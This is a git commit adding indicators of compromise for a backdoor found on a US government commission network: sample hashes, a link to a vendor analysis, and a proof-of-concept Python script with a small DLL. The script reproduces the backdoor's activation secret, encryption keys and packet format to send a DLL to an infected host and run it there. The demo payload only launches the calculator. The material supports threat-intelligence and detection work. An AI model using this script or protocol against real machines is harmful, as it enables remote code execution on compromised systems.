Add files via upload

2021-12-16 11:51:17 +01:00 · 2021-12-16 11:51:17 +01:00 · 866867df7f
parent e2cbdc553f
commit 866867df7f
7 changed files with 153 additions and 0 deletions
--- a/usgov-backdoor/README.md
+++ b/usgov-backdoor/README.md
@ -0,0 +1,13 @@
+# IOC for Backdoor on US Government Commission Network 
+
+Malware analysis and more technical informations at <https://decoded.avast.io/threatintel/avast-finds-backdoor-on-us-government-commission-network/>
+
+
+## Samples (SHA-256)
+#### oci.dll
+```
+6c6b40a0b03011eef925b5eb2725e0717ca04738a302935eaa6882a240c2229a
+c1177c33195863339a17ebd61ba5a009343edb3f3bddfc00b45c5464e738e0a1
+e964e5c8a9dd307ebb5735406e471e89b0aaa760ba13c4df1df8939b2c07cb90
+```
+
--- a/usgov-backdoor/rce_example/run_calculator_on_infected.py
+++ b/usgov-backdoor/rce_example/run_calculator_on_infected.py
@ -0,0 +1,121 @@
+import malduck
+import socket
+import lzo
+from random import randrange
+from struct import pack, unpack_from
+
+## Constants
+## IP address of targeted machine
+TARGET_IP = 'X.X.X.X'
+## Port of targeted machine, where any program listens to TCP
+TARGET_PORT = 8080
+## Path to dll that exports function SetNtApiFunctions
+PE_FILE_PATH = 'simpledll.dll'
+
+## Forced constants
+DEFLATE_LEVEL = 6
+OEMCP = 0
+MAGIC_DATE = 0x20160814
+RANDOM_KEY = randrange(2**32)
+PE_KEY = 0x1415CCE
+
+ACTIVATION_SECRET = 'CB5766F7436E22509381CA605B98685C8966F16B'
+ACTIVATION_SECRET = bytearray.fromhex(ACTIVATION_SECRET)
+
+PRECOMPUTED_KEY = (
+		'5C434846474C3F284EB64A4343433B4031E546C049584747454956FE4C51B369595A'
+		'A5DB6DA082696E6C6D72654E74DC706969696166570B6CE66F7E6D6D6B6F7C247277'
+		'D98F7F80CB0193C6A88F949293988B749A02968F8F8F878C7D31920C95A493939195'
+		'A24A989DFFB5A5A6F127B9ECCEB5BAB8B9BEB19AC028BCB5B5B5ADB2A357B832BBCA'
+		'B9B9B7BBC870BEC325DBCBCC174DDF12F4DBE0DEDFE4D7C0E64EE2DBDBDBD3D8C97D'
+		'DE58E1F0DFDFDDE1EE96E4E94B01F1F23D7305381A010604050AFDE60C7408010101'
+		'F9FEEFA3047E07160505030714BC0A0F7127171863992B5E40272C2A2B30230C329A'
+		'2E2727271F2415C92AA42D3C2B2B292D3AE2')
+PRECOMPUTED_KEY = bytearray.fromhex(PRECOMPUTED_KEY)
+
+## Commbines the precomputed 256 B key with the small one
+def expand_key(small_key: int):
+	small_key = bytearray(pack('L', small_key))
+	return(malduck.xor(small_key, PRECOMPUTED_KEY))
+
+
+## Preparation (compression, encryption, metadata)
+def prepare_payload(path: str):
+
+	def Read_dll(fn: str):
+		with open(fn,'rb') as f:
+			return f.read()
+
+	pe_file = Read_dll(path)
+	len_pe = len(pe_file)
+
+	compressed_pe = lzo.compress(pe_file)
+
+	metadata = bytearray(51)
+	metadata[16:20] = pack('l', len_pe)
+	metadata[36:40] = pack('l', len_pe)
+
+	once_encrypted = malduck.xor(expand_key(PE_KEY), metadata + compressed_pe)
+
+	# once_encrypted = bytearray(0x34)+once_encrypted
+	len_send_data = len(once_encrypted)+0x34
+	len_payload = len_send_data-0x18
+
+	not_encrypted_header = pack('L', len_payload) + pack('L', RANDOM_KEY)
+	encrypted_header=bytearray(0x2c)
+
+	encrypted_header[0x00:0x04] = pack('L', DEFLATE_LEVEL)
+	encrypted_header[0x0C:0x10] = pack('L', MAGIC_DATE)
+	encrypted_header[0x10:0x14] = pack('L', MAGIC_DATE)
+	encrypted_header[0x14:0x18] = pack('L', len_send_data)
+	encrypted_header[0x20:0x24] = pack('L', len_send_data)
+	encrypted_header[0x28:0x2c] = pack('L', len_send_data)
+
+	twice_encrypted = malduck.xor(expand_key(RANDOM_KEY), encrypted_header + once_encrypted)
+	payload = not_encrypted_header + twice_encrypted
+	return(payload)
+
+## Network part
+def send_and_receive(payload: bytes):
+	s = socket.socket()
+	try:
+		s.connect((TARGET_IP, TARGET_PORT))
+	except Exception as e:
+		print(e)
+		return(None)
+
+	try:
+		s.send(ACTIVATION_SECRET)
+		received = s.recv(1000)
+		s.send(payload)
+		s.close()
+	except Exception as e:
+		print(e)
+		s.close()
+		return(None)
+	return(received)
+
+## Decrypt and show response
+def parse_response(response: bytes):
+	if len(response) < 16:
+		print('Too short')
+		return()
+	print(f'Received message: {response.hex(" ")}')
+	rsp_len = unpack_from('L', response[0:4])[0]
+	rsp_key = unpack_from('L', response[4:8])[0]
+	
+	rsp_decrypted = malduck.xor(expand_key(rsp_key),response[8:])
+	
+	rsp_6 = unpack_from('L', rsp_decrypted[0:4])[0]
+	rsp_tl = unpack_from('L', rsp_decrypted[4:8])[0]
+	rsp_oemcp = unpack_from('L', rsp_decrypted[8:12])[0]
+	rsp_20160814 = unpack_from('L', rsp_decrypted[12:16])[0]
+
+	print(f'six:{rsp_6}, ThreadLocale:{rsp_tl}, OEMCP:{rsp_oemcp}, '
+		f'MagicDate:{hex(rsp_20160814)}, Rest:{rsp_decrypted[16:].hex(" ")}')
+
+
+payload = prepare_payload(PE_FILE_PATH)
+response = send_and_receive(payload)
+if response:
+	parse_response(response)
--- a/usgov-backdoor/rce_example/source/main.cpp
+++ b/usgov-backdoor/rce_example/source/main.cpp
@ -0,0 +1,7 @@
+#include "main.h"
+#include <windows.h>
+
+void DLL_EXPORT SetNtApiFunctions()
+{
+    ShellExecuteA(0, "open", "calc.exe", 0, 0, SW_SHOWNORMAL);
+}
--- a/usgov-backdoor/rce_example/source/main.h
+++ b/usgov-backdoor/rce_example/source/main.h
@ -0,0 +1,3 @@
+#define DLL_EXPORT __declspec(dllexport)
+
+void DLL_EXPORT SetNtApiFunctions();
--- a/usgov-backdoor/samples.md5
+++ b/usgov-backdoor/samples.md5
@ -0,0 +1,3 @@
+286f8f94f47d2b0032f8c627436cc156
+6dc11f664e85a00703684fcf9f594849
+3fed1cf73e6542497a1d7126dcf46664
--- a/usgov-backdoor/samples.sha
+++ b/usgov-backdoor/samples.sha
@ -0,0 +1,3 @@
+046ac04044291449d22dffbdbe86b5d07cd6454c
+3567e690aa231c1b7dd67f389b01ebd5706dae4b
+d58dce23d0497827f525036fadb044d24f27fd92
--- a/usgov-backdoor/samples.sha256
+++ b/usgov-backdoor/samples.sha256
@ -0,0 +1,3 @@
+6c6b40a0b03011eef925b5eb2725e0717ca04738a302935eaa6882a240c2229a
+c1177c33195863339a17ebd61ba5a009343edb3f3bddfc00b45c5464e738e0a1
+e964e5c8a9dd307ebb5735406e471e89b0aaa760ba13c4df1df8939b2c07cb90